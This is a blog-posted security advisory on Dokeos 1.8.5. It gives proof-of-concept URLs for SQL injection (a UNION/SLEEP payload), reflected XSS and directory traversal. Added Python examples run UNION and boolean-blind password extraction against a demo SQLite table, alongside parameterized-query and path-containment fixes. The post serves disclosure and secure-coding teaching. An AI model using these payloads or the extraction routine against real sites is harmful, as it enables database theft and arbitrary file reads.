Wednesday, May 13, 2009

Dokeos Free v.1.8.5 Multiple Vulnerabilities

Author: Gerendi Sandor Attila
Date: April 24, 2009
Package: Dokeos Free 1.8.5 Valparais
Product homepage: http://www.dokeos.com/
Versions Affected: v.1.8.5 (Other versions may also be affected)
Severity: High

SQL Injection:

1. The 'uInfo' parameter from /main/tracking/userLog.php is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Requires magic_quotes_gpc=OFF; but, as http://www.php.net/magic_quotes explains, relying on magic_quotes_gpc=ON for protection is highly discouraged.

Proof of concept request (SLEEP() exists only in MySQL 5.0.12 and later, but many other payloads work as well):
http://somehost/main/tracking/userLog.php?uInfo=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,SLEEP(30)%23
This request will hang for 30 seconds.

The resulting query, executed from get_user_info_from_id(), is:
SELECT * FROM `wa_dokeos_1_8_5_dokeos_main`.`user` WHERE `user_id` = '1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,SLEEP(30)#'

2. The 'course' parameter from /main/mySpace/lp_tracking.php is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Exploitation is similar to the vulnerability at point 1.
More elaborate injections can also be built to extract arbitrary data from the database through boolean-based blind extraction, recovering the data one true/false condition at a time.
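An added example, not code from the advisory or from Dokeos, of the two techniques above: a UNION injection that returns other rows through the vulnerable query, and the true/false (boolean-based blind) extraction that recovers a column character by character. The in-memory SQLite database, its table and rows are constructed for the demonstration and do not reflect the real Dokeos schema; the function names are hypothetical. SQLite has no SLEEP() and uses '-- ' rather than MySQL's '#' to discard the trailing quote, so the payload syntax differs slightly from the advisory's.

```python
import sqlite3

# Constructed stand-in for the Dokeos `user` table (assumption: the real
# table has 27 columns, as the advisory's UNION payload shows; three suffice here).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "alice", "hunter2")],
    )
    conn.commit()
    return conn


def get_user_info_vulnerable(conn, uinfo):
    """The unsafe pattern: uInfo is concatenated straight into the SQL text."""
    sql = "SELECT * FROM user WHERE user_id = '%s'" % uinfo
    return conn.execute(sql).fetchall()


def get_user_info_fixed(conn, uinfo):
    """The fix: a bound parameter is data, never SQL, whatever it contains."""
    return conn.execute("SELECT * FROM user WHERE user_id = ?", (uinfo,)).fetchall()


def union_dump(conn):
    """UNION injection: other rows come back through the same result set.

    The column count must match the original SELECT (three here, 27 in the
    advisory's payload). The trailing '-- ' comments out the closing quote.
    """
    payload = "x' UNION SELECT user_id, username, password FROM user -- "
    return sorted(get_user_info_vulnerable(conn, payload))


def page_shows_row(conn, uinfo):
    """The oracle for a blind attack: did the page render a user row or not."""
    return len(get_user_info_vulnerable(conn, uinfo)) > 0


def blind_extract(conn, column, target_id, max_len=64):
    """Boolean-based blind extraction, one character at a time.

    Each character is recovered with a binary search over its code point
    (about seven requests per character) using only the true/false oracle.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        exists = f"{target_id}' AND length({column}) >= {pos} -- "
        if not page_shows_row(conn, exists):
            break  # no character at this position: the value is complete
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"{target_id}' AND unicode(substr({column}, {pos}, 1)) > {mid} -- "
            if page_shows_row(conn, probe):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("union dump:", union_dump(db))
    print("blind extraction of the admin password:", blind_extract(db, "password", 1))
    print("injection against the fixed query:", get_user_info_fixed(db, "1' OR '1'='1"))
```

The same payloads passed to get_user_info_fixed() return nothing, because a bound parameter is compared as a value and never parsed as SQL; this is the change the concatenated query in get_user_info_from_id needs.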

XSS (Cross-Site Scripting):

1. The 'curdirpath' parameter from /main/document/slideshow.php is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
http://somehost/main/document/slideshow.php?curdirpath=1<script>alert(123)</script>
2. The 'file' parameter from /main/exercice/testheaderpage.php is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
http://somehost/main/exercice/testheaderpage.php?file=1<script>alert(123)</script>

Possible directory traversal (ineffective sanitization):

In hotspot_lang_conversion.php, $_GET['lang'] is sanitized as follows:

$search = array('../','\\0');
$lang = str_replace($search,'',urldecode($_GET['lang']));

The sanitization is weak. On Windows, ..\..\..\..\..\ traverses directories just as /../../../ does, and str_replace() does not remove a NULL character injected through the URL: in a PHP single-quoted string '\\0' is a literal backslash followed by a zero, not a NUL byte, so a %00 in the request survives the filter. On Windows a request like this passes the sanitization:

http://somehost/main/exercice/hotspot_lang_conversion.php?lang=..\..\..\..\..\..\..\todo.txt

Directory traversal:

1. Input passed to the 'doc_url' parameter in /main/exercice/Hpdownload.php is not properly verified before it is used to include files. This can be exploited to read arbitrary files from the local filesystem.
http://somehost/main/exercice/Hpdownload.php?doc_url=..\..\..\..\..\..\..\todo.txt
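An added example, not code from the advisory or from Dokeos, serving both the weak str_replace() filter in hotspot_lang_conversion.php and the unchecked doc_url in Hpdownload.php: it models the quoted filter to show exactly what slips through, then pairs it with the containment check both scripts are missing, which decides on the resolved path rather than on the input string. The function names, the base directories and the .php extension for language files are assumptions; the '....//' case goes beyond the advisory's proof of concept and follows from str_replace() making a single left-to-right pass per needle.

```python
import os
import re


def dokeos_sanitize_lang(lang):
    """Model of the str_replace() filter quoted from hotspot_lang_conversion.php.

    PHP's single-quoted '\\0' is a backslash followed by a zero, not a NUL
    byte, and str_replace() makes one left-to-right pass per needle, so
    backslash separators, real NUL bytes and '....//' all survive.
    """
    for needle in ("../", "\\0"):
        lang = lang.replace(needle, "")
    return lang


def resolve_inside(base_dir, user_path):
    """Return the real path of user_path below base_dir, or None if it escapes.

    Backslashes count as separators on every OS (the Windows behaviour the
    advisory relies on), NUL bytes, absolute paths and drive letters are
    rejected, and containment is checked on the resolved path.
    """
    if "\x00" in user_path:
        return None
    rel = user_path.replace("\\", "/")
    if rel.startswith("/") or re.match(r"^[A-Za-z]:", rel):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, rel))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # different drives on Windows
        inside = False
    return candidate if inside else None


# Assumed shape of a language name; the allowlist alone already rejects traversal.
LANG_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9_]{0,31}$")


def safe_lang_file(lang_dir, lang):
    """Allowlist first, containment second: the file must still be under lang_dir.

    The .php extension is an assumption for the example, not Dokeos's layout.
    """
    if not LANG_NAME.match(lang):
        return None
    return resolve_inside(lang_dir, lang + ".php")


if __name__ == "__main__":
    for sample in ("../../../todo.txt", "..\\..\\..\\todo.txt", "....//....//todo.txt", "en\x00.txt"):
        print(repr(sample), "->", repr(dokeos_sanitize_lang(sample)))
    docs = "/var/www/dokeos/courses"  # assumed document root for Hpdownload.php
    print(resolve_inside(docs, "..\\..\\..\\..\\..\\..\\..\\todo.txt"))  # None
    print(resolve_inside(docs, "COURSE1/document/intro.htm"))
    print(safe_lang_file("/var/www/dokeos/main/lang", "english"))
```

The model shows why string filtering is the wrong tool: each bypass is a different encoding of the same intent, and the list of encodings is never complete. Resolving the path and checking that it still starts with the base directory answers the question that actually matters.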

STATUS:
1. Contacted the author on April 29, 2009 via email.
2. The author released a patch (read here).
